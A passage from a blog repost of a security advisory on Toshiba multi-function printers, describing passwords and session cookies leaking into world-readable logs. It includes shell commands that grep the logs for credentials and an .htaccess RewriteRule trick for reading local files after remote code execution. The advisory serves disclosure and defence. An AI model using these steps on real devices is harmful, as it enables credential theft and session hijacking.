\/>\/ramdisk\/work\/log\/al\/swupdate.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 2306 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/usb.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1113 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/usbprn.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 14238 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/usermanagerplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 2553 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/viewplugin.log.0.txt<\/p>\n<p>\/ramdisk\/work\/log\/al\/epfx:<br \/>total 28<br \/>drwxrwxrwx 4 root trusted 0 May 23 15:14 .<br \/>drwxrwxrwx 5 root trusted 0 May 23 16:10 ..<br \/>-rwxrwxrwx 1 root trusted 28010 May 23 16:08 eprocessframework.log.0.txt<br \/>drwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1711<br \/>drwxrwxrwx 2 apache trusted 0 May 23 15:14 httpd_worker_1712<\/p>\n<p>\/ramdisk\/work\/log\/al\/wsp:<br \/>total 4<br \/>drwxrwxrwx 2 root trusted 0 May 23 15:15 .<br \/>drwxrwxrwx 5 root trusted 0 May 23 16:10 ..<br \/>-rw-rw-rw- 1 root trusted 3600 May 23 16:14 alwsprint.log.0.txt<\/p>\n<p>\/ramdisk\/work\/log\/al\/wsscn:<br \/>total 4<br \/>drwxrwxrwx 2 root trusted 0 May 23 15:15 .<br \/>drwxrwxrwx 5 root trusted 0 May 23 16:10 ..<br \/>-rw-rw-rw- 1 root trusted 1083 May 23 15:15 
alwswsc.log.0.txt<br \/>bash-4.1#<\/p>\n<p>### Clear-text password written in logs when a user logs into the printer<\/p>\n<p>When a user logs into the TopAccess web interface, the password will<br \/>be written in logs that are world-readable as shown below.<\/p>\n<p>Logging in as admin with the password `PASSWORD-SECRET-PIERRE`, we can see<br \/>the password saved in 2 log files that are world-readable:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/work\/log\/al\/boserverEvent.log.*.txt`<br \/>&#8211; &#8211; `\/ramdisk\/al\/network\/log\/http.log`<\/p>\n<p>Leak of credentials inside the log files:<\/p>\n<p>bash-4.1# grep -ri PIER .<br \/>.\/work\/log\/al\/boserverEvent.log.28.txt:&lt;Evt&gt;&lt;t&gt;05\/27<br \/>16:18:39443877&lt;\/t&gt;&lt;Set&gt;&lt;sID&gt;ContentWebServer_10.0.0.2.fda0f003cf95b852233893df36d9b1ff&lt;\/sID&gt;&lt;pID&gt;8556&lt;\/pID&gt;&lt;pName&gt;httpd&lt;\/pName&gt;&lt;SetValue&gt;&lt;Payload<br \/>XMLPayLoad = &quot;true&quot; overrideDelta =<br \/>&quot;true&quot;&gt;&lt;path&gt;&lt;\/path&gt;&lt;value&gt;&lt;Authentication&gt;&lt;UserCredential&gt;&lt;userName&gt;admin&lt;\/userName&gt;&lt;passwd&gt;PASSWORD-SECRET-PIERRE&lt;\/passwd&gt;&lt;ipaddress&gt;10.0.0.2&lt;\/ipaddress&gt;&lt;DepartmentManagement<br \/>isEnable=&quot;false&quot;&gt;&lt;requireDepartment\/&gt;&lt;\/DepartmentManagement&gt;&lt;domainName\/&gt;&lt;applicationType&gt;TOP_ACCESS&lt;\/applicationType&gt;&lt;\/UserCredential&gt;&lt;\/Authentication&gt;&lt;\/value&gt;&lt;\/Payload&gt;&lt;\/SetValue&gt;&lt;\/Set&gt;&lt;\/Evt&gt;<br \/>.\/al\/network\/log\/http.log:[Fri May 27 16:18:39.519454 2023][contentwebserver:debug] [pid 8556] ccontentwebserver.cpp(4175):<br \/>[client 10.0.0.2:41700] PASSWORD-SECRET-PIERRE, referer:<br \/>http:\/\/10.0.0.1:8080\/TopAccessLogin.html?v=1670282309ta<\/p>\n<p>These files have insecure permissions allowing any user to retrieve<br \/>the passwords and to modify the logs.<\/p>\n<p>The files can also be modified by a remote attacker using 
the<br \/>Pre-authenticated Remote Code Execution (as root or apache) and the multiple<br \/>Local Privilege Escalation vulnerabilities.<\/p>\n<p>bash-4.1# ls -la \/ramdisk\/al\/network\/log\/http.log<br \/>ls -la \/ramdisk\/al\/network\/log\/http.log<br \/>-rw-rw-rw- 1 root trusted 663910 May 27 16:20<br \/>\/ramdisk\/al\/network\/log\/http.log<br \/>bash-4.1# ls -la \/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>ls -la \/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>-rwxrwxrwx 1 root trusted 715841 May 27 16:20<br \/>\/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>bash-4.1#<\/p>\n<p>### Clear-text password written in logs when a password is modified<\/p>\n<p>Using the TopAccess web interface, it is possible to update the passwords of users.<\/p>\n[please use the HTML version at<br \/>https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html]\n<p>The new password can then be found in the log files (`NEW-PASSWORD-PIERRE`):<\/p>\n<p>bash-4.1# grep -r NEW-PASSWORD-PIERRE .<br \/>.\/work\/log\/al\/boserverEvent.log.28.txt:&lt;Evt&gt;&lt;t&gt;05\/27<br \/>16:22:22933938&lt;\/t&gt;&lt;Set&gt;&lt;sID&gt;ContentWebServer_10.0.0.2.63e5f73ea1d7ecf9cfd935393adb8b11&lt;\/sID&gt;&lt;pID&gt;4974&lt;\/pID&gt;&lt;pName&gt;httpd&lt;\/pName&gt;&lt;SetValue&gt;&lt;Payload<br \/>XMLPayLoad = &quot;true&quot; overrideDelta =<br \/>&quot;true&quot;&gt;&lt;path&gt;&lt;\/path&gt;&lt;value&gt;&lt;UserManager&gt;&lt;View&gt;&lt;UpdateUser&gt;&lt;User<br \/>ID=&quot;10002&quot;&gt;&lt;Information&gt;&lt;passwd&gt;NEW-PASSWORD-PIERRE&lt;\/passwd&gt;&lt;UserSoftKeyboardDisplay&gt;true&lt;\/UserSoftKeyboardDisplay&gt;&lt;\/Information&gt;&lt;\/User&gt;&lt;\/UpdateUser&gt;&lt;\/View&gt;&lt;\/UserManager&gt;&lt;\/value&gt;&lt;\/Payload&gt;&lt;\/SetValue&gt;&lt;\/Set&gt;&lt;\/Evt&gt;<br \/>bash-4.1#<\/p>\n<p>This log file also has insecure permissions, allowing any user to<br \/>retrieve the passwords or to modify the log file.<\/p>\n<p>The files can 
also be modified by a remote attacker using the<br \/>Pre-authenticated Remote Code Execution (as root or apache) and the multiple<br \/>Local Privilege Escalation vulnerabilities.<\/p>\n<p>bash-4.1# ls -la \/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>ls -la \/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>-rwxrwxrwx 1 root trusted 886685 May 27 16:23<br \/>\/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>bash-4.1#<\/p>\n<p>An attacker can retrieve passwords.<\/p>\n<p>An attacker can modify the logs.<\/p>\n<p>A remote attacker can retrieve the credentials and bypass the<br \/>authentication mechanism by uploading a .htaccess file containing a<br \/>RewriteRule (`RewriteRule \/pwned.txt file:\/path\/to\/local\/file`), using<br \/>the Pre-authenticated Remote Code Execution (as root or apache) and the<br \/>multiple Local Privilege Escalation vulnerabilities.<\/p>\n<p>## Details &#8211; Leak of authentication sessions in insecure logs in the<br \/>\/ramdisk\/work\/log directory<\/p>\n<p>It was observed that the session cookies, used for authentication, are<br \/>stored in clear-text logs. These logs are world-readable and some can<br \/>also be freely modified by any local attacker.<\/p>\n<p>Some logs are stored inside the `\/ramdisk\/work\/log` directory with<br \/>insecure permissions. 
We can find the authentication sessions (e.g.<br \/>`ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e`) inside.<\/p>\n<p>Leak of sessions inside the log files:<\/p>\n<p>bash-4.1# pwd<br \/>\/work\/log<br \/>bash-4.1# grep -r '10.0.0.2\\.' *<br \/>[&#8230;].\/log\/al\/boserverEvent.log.26.txt:&lt;Evt&gt;&lt;t&gt;05\/30<br \/>15:50:21222835&lt;\/t&gt;&lt;Session<br \/>&quot;timerReset&quot;&gt;&lt;id&gt;ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e&lt;\/id&gt;&lt;num&gt;658&lt;\/num&gt;&lt;pID&gt;2670&lt;\/pID&gt;&lt;pName&gt;alappmanager&lt;\/pName&gt;&lt;newTimerValue&gt;0&lt;\/newTimerValue&gt;&lt;\/Session&gt;&lt;\/Evt&gt;<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:05535294 Pid= 1657,Tid=<br \/>1784,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command<br \/>'GetSettings' from Plugin to 'httpd' in<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:05552743 Pid= 1657,Tid=<br \/>1783,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command<br \/>'LicenseEnableCheck' from 'httpd' to Plugin 'LicenseMgmt-0x9f' with<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:05556758 Pid= 1657,Tid=<br \/>1785,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command<br \/>'LicenseEnableCheck' from Plugin to 'httpd' in<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:14741108 Pid= 1657,Tid=<br \/>1784,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command<br \/>'LicenseEnableCheck' from 'httpd' to Plugin 'LicenseMgmt-0x9f' with<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:14745065 Pid= 
1657,Tid=<br \/>1783,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command<br \/>'LicenseEnableCheck' from Plugin to 'httpd' in<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/aldeviceconfig.log.0.txt: * SessionID :<br \/>ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>.\/log\/al\/aldeviceconfig.log.0.txt: * DeltaDocName :<br \/>hdb:\/ramdisk\/al\/tmp\/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e\/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>[&#8230;].\/log\/al\/aldeviceconfig.log.0.txt: * DeltaDocName :<br \/>hdb:\/ramdisk\/al\/tmp\/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e\/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>.\/log\/al\/sapp\/python_settingapp.log:03\/16 20:57:34966 Pid= 5653<br \/>Tid= 1820326768 tweens.py 176 WARNING Add session map. key =<br \/>ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value =<br \/>ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7<br \/>.\/log\/al\/sapp\/python_settingapp.log:03\/16 21:08:35016 Pid= 5653<br \/>Tid= 1675623280 tweens.py 347 WARNING Delete session map. 
key =<br \/>ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value =<br \/>ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7, length1<br \/>.\/log\/al\/authplugin.log.0.txt:05\/30 15:16:07935854 Pid=<br \/>1872,UserAuthManger.cpp:11476:ERR:delta Doc<br \/>Name::hdb:\/ramdisk\/al\/tmp\/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e\/AuthenticationTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>[&#8230;].\/log\/al\/renderer.log.1.txt:05\/30 20:21:13780508 Pid= 1992,Tid=<br \/>2939,LegacyPanel\/src\/cpanelmanager.cpp: 2983:WRN:Rcv ST : 72 :<br \/>1c000001 : &lt;?xml version=&quot;1.0&quot;<br \/>encoding=&quot;UTF-8&quot;?&gt;&lt;Notification&gt;&lt;Payload<br \/>model=&quot;pull&quot;&gt;&lt;path&gt;SecurityConfiguration\/SecuritySettings\/isLoginReqd&lt;\/path&gt;&lt;sessionID&gt;ContentWebServer_10.0.0.2.ab52ced8304357f2b382460bbdd797dc&lt;\/sessionID&gt;&lt;subscriptionID&gt;1275&lt;\/subscriptionID&gt;&lt;\/Payload&gt;&lt;\/Notification&gt;<br \/>[&#8230;]\/log\/al\/prm.log.0.txt:05\/30 15:18:16563007 Pid= 1885,Tid=<br \/>2163,manager.cpp: 1874:ERR:Delta Document<br \/>hdb:\/ramdisk\/al\/tmp\/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e\/PresentationResourcesTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>could not be opened. 
Creating it<\/p>\n<p>We can list the files containing such authentication sessions:<\/p>\n<p>- log\/al\/aldeviceconfig.log.0.txt<br \/>- log\/al\/appmanager.log.0.txt<br \/>- log\/al\/appmanagerlibrary.log.0.txt<br \/>- log\/al\/authplugin.log.0.txt<br \/>- log\/al\/boserver.log.0.txt<br \/>- log\/al\/boserverEvent.log.26.txt<br \/>- log\/al\/epfx\/eprocessframework.log.0.txt<br \/>- log\/al\/prm.log.0.txt<br \/>- log\/al\/renderer.log.0.txt<br \/>- log\/al\/renderer.log.1.txt<br \/>- log\/al\/renderer.log.2.txt<br \/>- log\/al\/sapp\/python_settingapp.log<br \/>- log\/al\/webpanel\/eapi.log.0.txt<\/p>\n<p>Using the shell:<\/p>\n<p>bash-4.1# grep -r '10.0.0.2\\.' * | sed -e 's#:# #' | awk '{ print<br \/>$1 }' | sort | uniq<br \/>log\/al\/aldeviceconfig.log.0.txt<br \/>log\/al\/appmanager.log.0.txt<br \/>log\/al\/appmanagerlibrary.log.0.txt<br \/>log\/al\/authplugin.log.0.txt<br \/>log\/al\/boserver.log.0.txt<br \/>log\/al\/boserverEvent.log.26.txt<br \/>log\/al\/epfx\/eprocessframework.log.0.txt<br \/>log\/al\/prm.log.0.txt<br \/>log\/al\/renderer.log.0.txt<br \/>log\/al\/renderer.log.1.txt<br \/>log\/al\/renderer.log.2.txt<br \/>log\/al\/sapp\/python_settingapp.log<br \/>log\/al\/webpanel\/eapi.log.0.txt<br \/>log\/al\/webpanel\/python_ta.log<\/p>\n<p>These files have insecure permissions allowing any user to retrieve<br \/>the passwords, and some files can be freely modified by any local<br \/>attacker (or any remote attacker using the Pre-authenticated Remote<br \/>Code Execution as root or apache and multiple Local Privilege<br \/>Escalations vulnerability):<\/p>\n<p>Insecure permissions for log files:<\/p>\n<p>bash-4.1# for i in $(grep -r '10.0.0.2\\.' * | sed -e 's#:# #' |<br \/>awk '{ print $1 }' | sort | 
uniq); do ls -la $i;done<br \/>-rw-r--r-- 1 apache trusted 177116 May 30 15:51<br \/>log\/al\/aldeviceconfig.log.0.txt<br \/>-rw-r--r-- 1 apache trusted 57508 May 30 15:51 log\/al\/appmanager.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 285227 May 30 16:15<br \/>log\/al\/appmanagerlibrary.log.0.txt<br \/>-rw-r--r-- 1 apache trusted 8839 May 30 15:51 log\/al\/authplugin.log.0.txt<br \/>-rw-r--r-- 1 apache trusted 57082 May 30 15:51 log\/al\/boserver.log.0.txt<br \/>-rwxr-xr-x 1 apache trusted 850786 May 30 15:51<br \/>log\/al\/boserverEvent.log.26.txt<br \/>-rwxr-xr-x 1 apache trusted 18608 May 30 15:51<br \/>log\/al\/epfx\/eprocessframework.log.0.txt<br \/>-rw-r--r-- 1 apache trusted 18151 May 30 15:51 log\/al\/prm.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 1048682 May 30 19:28 log\/al\/renderer.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 1048606 May 30 21:50 log\/al\/renderer.log.1.txt<br \/>-rw-r--r-- 1 apache trusted 527501 May 30 15:51 log\/al\/renderer.log.2.txt<br \/>-rwxrwxrwx 1 apache trusted 1958 May 30 21:08<br \/>log\/al\/sapp\/python_settingapp.log<br \/>-rwxrwxrwx 1 root trusted 669880 May 30 16:15 log\/al\/webpanel\/eapi.log.0.txt<br \/>-rwxrwxrwx 1 apache trusted 311373 May 30 15:53<br \/>log\/al\/webpanel\/python_ta.log<\/p>\n<p>An attacker can retrieve authentication sessions.<\/p>\n<p>A remote attacker can retrieve the credentials and bypass the<br \/>authentication mechanism by uploading a .htaccess file containing a<br \/>RewriteRule (`RewriteRule \/pwned.txt file:\/path\/to\/local\/file`), using<br \/>the Pre-authenticated Remote Code Execution as root or apache and<br \/>multiple Local Privilege Escalations vulnerability.<\/p>\n<p>## Details &#8211; Leak of authentication sessions in insecure logs in<br \/>\/ramdisk\/al\/network\/log directory<\/p>\n<p>It was observed that the sessions are stored in clear-text logs. 
These<br \/>logs are world-readable and some can also be freely modified by any<br \/>local attacker.<\/p>\n<p>Some logs are stored inside the `\/ramdisk\/al\/network\/log` directory<br \/>with insecure permissions. We can find the authentication sessions<br \/>inside:<\/p>\n<p>bash-4.1# pwd<br \/>\/ramdisk\/al\/network\/log<br \/>bash-4.1# ls -la<br \/>total 184<br \/>drwxr-xr-x 6 root root 0 May 30 10:38 .<br \/>drwxr-xr-x 7 root root 0 May 30 10:39 ..<br \/>-rw-rw-rw- 1 root trusted 1455 May 30 10:38 dibbler-client.log<br \/>-rw-rw-rw- 1 root trusted 23051 May 30 16:48 hp9100.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 58886 May 30 17:29 http.log<br \/>-rw-rw-rw- 1 root trusted 6143 May 30 17:29 http_access.log<br \/>-rw-rw-rw- 1 root trusted 9194 May 30 14:08 https.log<br \/>-rw-rw-rw- 1 root trusted 962 May 30 15:01 lprng.log.0.txt<br \/>-rw-r----- 1 root adm 8767 May 30 16:38 maillog<br \/>-rw-rw-rw- 1 root trusted 58619 May 30 17:23 nqlog.log<br \/>drwxrwxrwx 2 root trusted 0 May 30 10:38 wsd<br \/>drwxrwxrwx 2 root trusted 0 May 30 10:38 wsm<br \/>drwxrwxrwx 2 root trusted 0 May 30 10:38 wsp<br \/>drwxrwxrwx 2 root trusted 0 May 30 10:38 wsscn<br \/>bash-4.1# grep SessionID *<br \/>http.log:[Thu May 30 17:29:08.209477 2023][contentwebserver:debug] [pid 5113] ccontentwebserver.cpp(1130):<br \/>[client 10.0.0.2:43384] CContentWebServer::<br \/>SessionID=[ContentWebServer_10.0.0.2.874eef7e817c9d053cbdc618d850ab61]ignoreSessionTimeout=[IgnoreSessionTimeout], referer:<br \/>http:\/\/10.0.0.1:8080\/<br \/>http.log:[Thu May 30 17:29:08.739761 2023][contentwebserver:debug] [pid 5118] ccontentwebserver.cpp(1130):<br \/>[client 10.0.0.2:43386] CContentWebServer::<br \/>SessionID=[ContentWebServer_10.0.0.2.874eef7e817c9d053cbdc618d850ab61]ignoreSessionTimeout=[IgnoreSessionTimeout], referer:<br \/>http:\/\/10.0.0.1:8080\/FrameIndex.html?v=1670282309ta<br \/>[&#8230;]bash-4.1# grep -i cookie *<br \/>http.log:Utility::GetCookie sCookievalue=[]http.log:[Thu May 30 
12:49:00.729591 2023][contentwebserver:error] [pid 5121] [client 10.0.0.2:50619][utility.cpp : 563] In SetCookie:: NO cookieInfo sent<br \/>http.log:[Thu May 30 12:49:00.729632 2023][contentwebserver:error] [pid 5121] [client 10.0.0.2:50619][utility.cpp : 594] In SetCookie::cookiebuf<br \/>10.0.0.2.289d834d7086d004ce9a710590e10be1<br \/>http.log: Utility::GetCookie cookieName=[Session]http.log:Utility::GetCookie sCookievalue=[]http.log:[Thu May 30 14:08:17.935840 2023]\n","protected":false},"excerpt":{"rendered":"<p>Hello, Please find a text-only version below sent to security mailing lists. The complete version on &#8220;40 vulnerabilities in Toshiba Multi-FunctionPrinters&#8221; is posted here:https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html The text version is also posted here:https:\/\/pierrekim.github.io\/advisories\/2024-toshiba-mfp.txt === text-version of the advisory === &#8212;&#8211;BEGIN PGP SIGNED MESSAGE&#8212;&#8211;Hash: SHA512 ## Advisory Information Title: 40 vulnerabilities in Toshiba Multi-Function PrintersAdvisory URL: https:\/\/pierrekim.github.io\/advisories\/2024-toshiba-mfp.txtBlog URL: 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57884","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57884","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57884"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57884\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57884"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57884"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57884"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}